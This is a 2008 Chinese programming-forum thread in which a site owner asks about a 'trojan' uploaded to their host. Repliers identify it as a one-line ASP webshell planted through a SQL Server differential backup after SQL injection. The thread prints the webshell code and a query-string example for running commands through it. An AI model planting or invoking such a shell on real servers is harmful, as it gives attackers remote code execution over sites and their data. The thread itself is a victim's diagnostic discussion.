请问这种木马代码是如何加密的,用啥能解密

XUZIFENG 2008-04-08 11:15:24
有人传木马上我空间,有谁能帮我看下这是如何加密的
我想看下,代码内容,看看这代码是干吗的

头1行:
TAPE??咊,^a <Microsoft SQL ServerSPAD^LSFMB 8曀`SSETd?za <

中间一段
?/8
/?
{@T?8/?ΥQ?
/?8
/?
?T?8/?ΥQ?/?8/?ΥQ?B/?8
/?
{S?8/?ΥQ/?8
/?T?4/?ΥQFt/??D
...全文
182 8 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
gingerkang 2008-04-09
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 chinmo 的回复:]
这个兄弟说得不错

看来也是很熟悉的啊
[/Quote]

对此以前就有所了解,在baidu,google上搜索也会有很多相关的文章介绍.
问题出来web服务和sqlserver服务共用一台服务器,而且sqlserver分配的帐号权限给得太大,dbo就已经具备备份数据库的权限,一个虚拟主机用到了该权限的帐号,只要该站点存在注入,这台服务器的所有站点都是鱼肉了.
Atai-Lu 2008-04-09
  • 打赏
  • 举报
回复
看不懂,哎~
  • 打赏
  • 举报
回复
[Quote=引用 2 楼 gingerkang 的回复:]
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
[/Quote]

这个兄弟说得不错

看来也是很熟悉的啊
liyong888_8 2008-04-09
  • 打赏
  • 举报
回复
jf
hookee 2008-04-09
  • 打赏
  • 举报
回复
主要是生成的asp文件注入了<%execute(request("a"))%>,前后的字符都没有关系
访问的时候可以 1.asp?a=asp代码 的方式
比如 1.asp?a=response.write(server.mappath("/")):response.end
black__art 2008-04-09
  • 打赏
  • 举报
回复
呵呵,JF
gingerkang 2008-04-08
  • 打赏
  • 举报
回复
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
XUZIFENG 2008-04-08
  • 打赏
  • 举报
回复
对了 中间还有这类的

P
^/?/?睶(/?�TT? <%execute(request("a"))%>爆鹣`8?`8?`鹣`鹣`P爆\爆o5J4

c/?#a`P�"睶3築栳@tAllocate RootD/?
"睶?(/??`/D/?
"睶?c/??pX/?

我运行这些代码出错 说

Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/1.asp, 第 33 行


28,409

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧